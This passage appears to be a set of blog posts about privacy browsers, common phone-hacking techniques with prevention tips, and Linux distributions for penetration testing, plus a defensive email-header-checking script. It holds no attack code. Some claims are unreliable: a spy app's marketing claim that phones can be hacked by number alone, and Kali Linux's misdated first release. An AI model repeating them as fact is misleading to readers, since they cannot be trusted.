There is no plugin whitelist (meaning you can run Java Applets and Silverlight apps), you can run whichever extensions you like (including bootstrapped add-ons that can completely change functionality of the browser) and absolutely no data or telemetry is sent back to Mozilla or the Waterfox project.

We recommend this Web browser to both regular and more advanced users. That’s because Waterfox comes equipped with everything you could possibly need without installing add-ons or extensions of any kind.


6. Iron Browser


Our list of the best anonymous browsers wouldn’t be complete without Iron. This one is designed for long-term Chrome users looking for a way to get away from Google.

Iron is based on Chromium, which is why it looks very similar to Chrome. However, this browser has eliminated pretty much all types of Google-related tracking.

We are talking about Chrome features such as Installation-ID, Suggest, Alternate Error Pages, Error Reporting, RLZ-Tracking, and URL-tracking. We should also mention that Iron is under active development.


Closing note

Congratulations, you have reached the end of our guide to protecting your online privacy with 6 anonymous browsers. In case of any questions, don’t hesitate to post a comment below. Thanks.

Techniques Hackers use To Hack Smartphones. How to prevent?

How to prevent smartphone attacks?

The world with advanced technology has become great and sometimes harmful. “At the end of the day, everything is hackable. What I am surprised about is that people sometimes forget that it’s so easy to hack into their devices,” said Adi Sharabani, the co-founder of mobile security company Skycure, who used to work for Israeli Intelligence.

Hackers can get into your phone without your knowledge. Human vulnerabilities give hackers access to many devices without them ever touching the victim’s device. Day and night, smartphone vendors work on securing the phones they sell, while hackers test for vulnerabilities day and night too.

The threat of having your phone hacked has become a common and rational fear. The cold, hard truth is that it is now possible to hack any phone.

With the advancement of technology, where the discovery of knowledge and information advances the understanding of technology, hackers are able to hack even some of the most sophisticated phone software.

Hacking techniques

Unfortunately, there are many hackers with malicious intent that can and do break into an Android device to steal valuable personal information or profit from illegal financial transactions. While it may be hard (or even impossible) to make your Android unhackable, there are things you can do to make your device more secure.

We wrote a blog post to help you find out whether your smartphone is tapped or spied on.

Examples of hacking attacks

  • Malware attack
  • Phishing attack
  • SQL Injection Attack
  • Cross-Site Scripting (XSS)
  • Denial of Service (DoS)
  • Session Hijacking and Man-in-the-Middle Attacks
  • Credential Reuse

Malware

If you’ve ever seen an antivirus alert pop up on your screen, or if you’ve mistakenly clicked a malicious email attachment, then you’ve had a close call with malware. Attackers love to use malware to gain a foothold on users’ computers and, consequently, the offices they work in because it can be so effective.

Attackers will use a variety of methods to get malware onto your computer, but at some stage, it often requires the user to take some action to install the malware.

This can include clicking a link to download a file, or opening an attachment that may look harmless (like a Word document or PDF attachment), but actually has a malware installer hidden within.

Phishing attack

When an attacker wants you to install malware or divulge sensitive information, they often turn to phishing tactics, or pretending to be someone or something else to get you to take an action you normally wouldn’t. Since they rely on human curiosity and impulses, phishing attacks can be difficult to stop.

So, in a phishing attack, an attacker may send you an email that appears to be from someone you trust, like your boss or a company you do business with. The email will seem legitimate, and it will have some urgency to it (e.g., fraudulent activity has been detected on your account).

In the email, there will be an attachment to open or a link to click. Upon opening the malicious attachment, you’ll thereby install the malware on your device.

If you click the link, it may send you to a legitimate-looking website that asks for you to log in to access an important file. Except the website is actually a trap used to capture your credentials when you try to log in.

To reduce the risk of being phished, you can use these techniques:

  • Critical thinking: do not accept that an email is the real deal just because you’re busy or stressed, or you have 150 other unread messages in your inbox. Stop for a minute and analyze the email.
  • Hovering over the links: Move your mouse over the link, but do not click it! Just let your mouse cursor hover over the link and see where it would actually take you. Apply critical thinking to decipher the URL.
  • Analyzing email headers: Email headers define how an email got to your address. The “Reply-to” and “Return-Path” parameters should lead to the same domain as is stated in the email.
  • Sandboxing: You can test email content in a sandbox environment, logging activity from opening the attachment or clicking the links inside the email.
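
One way to automate the header check from the list above, as an added example that is not part of the original article: it parses a raw message with Python's standard `email` module and reports when the Reply-To or Return-Path domain differs from the From domain. The sample messages, addresses and function names are constructed for illustration, and comparing only the last two domain labels is a simplifying assumption.

```python
"""Compare the From, Reply-To and Return-Path domains of an email (added example)."""
from email import message_from_string
from email.utils import getaddresses

# Constructed sample messages; every name and address below is invented.
CONSISTENT = """\
Return-Path: <bounce@mail.example.com>
From: "Example Billing" <billing@example.com>
Reply-To: support@example.com
Subject: Your invoice

Body
"""

SUSPICIOUS = """\
Return-Path: <x91@bulk-sender.test>
From: "Example Billing" <billing@example.com>
Reply-To: "Example Billing" <billing.example@freemail.test>
Subject: Fraudulent activity detected on your account

Body
"""


def base_domain(address):
    """Return the last two labels of the address's domain, lower-cased.

    Assumption: two labels approximate the organisational domain. That is
    wrong for suffixes such as .co.uk; a real tool should consult the
    Public Suffix List.
    """
    domain = address.rpartition("@")[2].strip().lower().rstrip(".")
    if not domain:
        return None
    return ".".join(domain.split(".")[-2:])


def header_domains(msg, name):
    """Collect the base domains of all addresses in every `name` header."""
    found = set()
    for _display, addr in getaddresses(msg.get_all(name, [])):
        if "@" in addr:  # skips the empty bounce path "<>" and junk values
            found.add(base_domain(addr))
    return found


def check_headers(raw):
    """Return a list of findings; an empty list means the domains agree."""
    msg = message_from_string(raw)
    from_domains = header_domains(msg, "From")
    if len(from_domains) != 1:
        return ["From header is missing, unparsable or names several domains"]
    (claimed,) = from_domains
    findings = []
    for header in ("Reply-To", "Return-Path"):
        for other in sorted(header_domains(msg, header) - {claimed}):
            findings.append(
                f"{header} domain {other} differs from From domain {claimed}"
            )
    return findings


if __name__ == "__main__":
    for label, raw in (("consistent", CONSISTENT), ("suspicious", SUSPICIOUS)):
        print(label, check_headers(raw) or "no mismatch")
```

A mismatch is a reason to look closer rather than proof of phishing, because legitimate bulk-mail services often use their own bounce domain in Return-Path.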

Hacking Software

Did you know that hacking software for Android and other mobile devices exists? And did you know there are countless hacking software options online for free? Hacking software is a method used by hackers to get information from a phone.

Despite the price of hacking software, serious hackers can buy hacking software anywhere, such as a phone spy app, which must be installed on the target phone. Not all hackers need to handle the victim’s phone physically to install hacking software. But in some cases, they must.

Keyloggers are a type of monitoring software designed to record keystrokes made by a user. One of the most traditional types of cyber threat, these keystroke loggers record the information you type into a website or application and send it back to a third party.

A keylogger can be installed on your phone to record all the information you type on your keyboard and send it to a third party set by the hacker.


A Trojan horse, or Trojan, is a type of malware that is often disguised as legitimate software. Trojans can be employed by cyber-thieves and hackers trying to gain access to users’ systems.

Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems. Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.

Hackers use phishing to trick victims into installing Trojans on their devices. A Trojan’s actions can include:

  • Deleting data
  • Blocking data
  • Modifying data
  • Copying data
  • Disrupting the performance of computers or computer networks

Spyware is a type of program that is installed to collect information about users, their computers, or their browsing habits. It tracks everything you do without your knowledge and sends the data to a remote user.

It also can download and install other malicious programs from the internet. Spyware works like adware, but is usually a separate program that is installed unknowingly when you install another freeware application.


Commercial spy apps are also marketed as tools for hacking someone’s phone by its number, and as the outstanding choice among phone-number hacking applications.

One such app claims that more than a million clients in 190+ nations depend on it, and that it can hack somebody’s mobile phone with just their number if they’re using an Android or iOS device.


SIM Card Hacking

In August 2019, the CEO of Twitter had his SIM card hacked by SIM card swapping using the phishing method. SIM card swapping is performed when the hacker contacts your phone provider, pretends to be you, and then asks for a replacement SIM card.

Once the provider sends the new SIM to the hacker, the old SIM card will be deactivated, and your phone number will be stolen. This means the hacker has taken over your phone calls, messages, etc.

This method of hacking is relatively easy if the hacker can convince the provider that they are you. Keeping personal details to yourself is an important part of ensuring that hackers cannot pretend to be you.

In addition, Adaptive Mobile Security discovered a new way hackers were getting into phones using the SIM card—a method they call Simjacker. This method of hacking is more complex than phishing, as it targets a SIM card by sending a signal to the target device. If the message is opened and clicked on, hackers are able to spy on the hacked device and even find out the location of the device.


Bluetooth Hacking

Professional hackers can use special software products to search for vulnerable mobile devices with an active Bluetooth connection. These types of hacks are done when a hacker is in range of your phone, usually in a populated area.

Once hackers are connected to your Bluetooth, they have access to all the information available and to the internet connection to access the web, but the data must be downloaded while the phone is within range.


How to avoid becoming a victim of phone hacking

As you saw, there are many techniques and tools hackers can use to hack your devices. Here are a few tips to ensure that you are not a victim of phone hacking:

1. Avoid sharing your phone with untrusted people

The easiest way for a hacker to steal your phone’s information is to gain access to it. Therefore, it is always important to avoid sharing your phone with untrusted people.

If you have been away from your phone around a group of strangers and are concerned about possible hacking, check your settings and look for strange apps.

2. Encrypt your device

Encrypting your cell phone can protect you from being hacked and can protect your calls, messages, and critical information. To check if a device is encrypted, iPhone users can go into Touch ID & Passcode, scroll to the bottom, and enable Data protection. Android users have automatic encryption depending on the type of phone.

3. Lock your SIM card

Additionally, putting a passcode on your SIM card can protect it from being hacked.

4. Check your Wi-Fi and Bluetooth

It is fairly easy for hackers to connect to your phone using Wi-Fi or Bluetooth if they are on, so turn them off when not needed because there is no warning when a hacker attacks you.

If you fear being hacked in a public space, turning off your phone can block a hacker’s ability to hack you. This is an effective preventative method.

5. Use security protection or install anti-malware

Protecting your device from hackers requires some knowledge, which you now have. Using the security features your device provides, or installing an antivirus or anti-malware app on your device, will block some untrusted apps and websites.

Closing word

Making a point to understand how hacking works can help you practice security in your everyday life. Know how to be prepared for being hacked, so that when it happens you can be on top of how to handle it.

6 best Linux distributions for hacking & penetration testing

Linux distributions for hacking and penetration testing

For hacking and penetration testing, there are several operating systems that you should know or use once you want to start. In this article, we are going to discuss only the 6 best Linux distributions.

What is hacking?

Hacking refers to activities that seek to compromise digital devices, such as computers, smartphones, tablets, and even entire networks. And while hacking might not always be for malicious purposes, nowadays most references to hacking, and hackers, characterize it/them as unlawful activity by cybercriminals, motivated by financial gain, protest, information gathering (spying), and even just the “fun” of the challenge.

What is penetration testing?

Penetration testing, also called pen testing or ethical hacking, is the practice of testing a computer system, network, or web application to find security vulnerabilities that an attacker could exploit.

Penetration testing can be automated with software applications or performed manually. Either way, the process involves gathering information about the target before the test, identifying possible entry points, attempting to break in — either virtually or for real — and reporting back the findings.

The main objective of penetration testing is to identify security weaknesses. Penetration testing can also be used to test an organization’s security policy, its adherence to compliance requirements, its employees’ security awareness, and the organization’s ability to identify and respond to security incidents.


1. Kali Linux – distros for hacking and penetration testing


Kali Linux, number 1 among our 6 best OSes for hacking and penetration testing, is a distribution based on Debian and developed by Offensive Security.

The first release was on February 5, 2006; it is the continuation of the BackTrack Linux project.

Hundreds of hacking tools come pre-installed with Kali Linux for various operations such as pen testing, vulnerability analysis, forensic analysis, information gathering, wireless attacks, exploitation, etc.

It used to use GNOME as its desktop environment. Nowadays Kali Linux is a rolling-release distro, and you can use a desktop environment of your choice, like KDE, MATE or XFCE.

It also has a lot of tools in the Kali repositories. You can download Kali Linux from the Download page of its official website. Kali Linux ranked number one in the Top 6 Penetration Testing & Ethical Hacking Linux 2020.


2. Parrot Security OS for hacking and penetration testing:


Parrot Security, number 2 among our 6 best OSes for hacking and penetration testing, is a forensics distro dedicated to ethical hackers and cyber security professionals.

Parrot OS contributes to the security community just as Kali Linux does, with a variety of hacking tools and an excellent GUI.

It also has a big repository that collects a lot of amazing hacking tools for newbies and experts. It is developed by FrozenBox.

The first release was in June 2013. It used to use MATE as its desktop environment, and it is based on Debian, like Kali Linux. You can download Parrot Security from the Download page of its official website.


3. BackBox Linux:


BackBox Linux, number 3 among our 6 best Linux distros for hacking and penetration testing, is a distro based on Ubuntu Linux.

It is developed by the BackBox Team. The first release was on September 9, 2010.

BackBox used to use XFCE as its desktop environment and Ubuntu LTS versions as its base.

It also contains the most professional, famous, and widely used tools in the pentesting field, like MSF, NMAP, BurpSuite, Armitage, SQLMap, and so on. You can download BackBox Linux from the Download page of its official website.


4. BlackArch Linux:


BlackArch Linux, based on Arch Linux, is number 4 among our 6 best Linux distros for hacking and penetration testing. It is designed for professional and elite hackers who have the ability to work with Linux like a pro.

BlackArch contains nearly 2500 hacking tools, covering almost all the phases in cybersecurity.

It used to use Fluxbox & OpenBox as its desktop environment, along with other DEs. It has a huge number of tools in its repository, with more than 1500+ hacking tools included in the distro & repo. The first release was in 2013. You can download BlackArch Linux from the Download page of its official website.

5. Fedora Security Lab:


The Fedora Security environment, number 5 among our 6 best Linux distros for hacking and penetration testing, enables you to work on security auditing, forensics, and hacking. It also comes with a clean and fast desktop environment.

This distro contains essential networking tools like Wireshark, Medusa, Sqlninja, Yersinia, and more. The Fedora Security environment makes pen-testing and security testing simple. You can download Fedora Security from the Download page of its official website.

6. Samurai Web Testing Framework (Samurai-WTF):


Samurai WTF, number 6 among our 6 best Linux distros for hacking and penetration testing, is a professional web application penetration testing framework and distro.

It contains only web app pentest tools such as Burpsuite, SQLMap, and so on. It is based on Ubuntu. The first release was in 2008. You can download the Samurai Web Testing Framework from the Download page of its official website.

Closing note

Choosing the best Linux distro for hacking & penetration testing is a good step towards learning ethical hacking and penetration testing concepts, enhancing your skills and protecting enterprise assets from cybercriminals.

Every security professional has their own favourite security OS for using hacking tools, for both learning and commercial purposes. Make a good choice for yourself.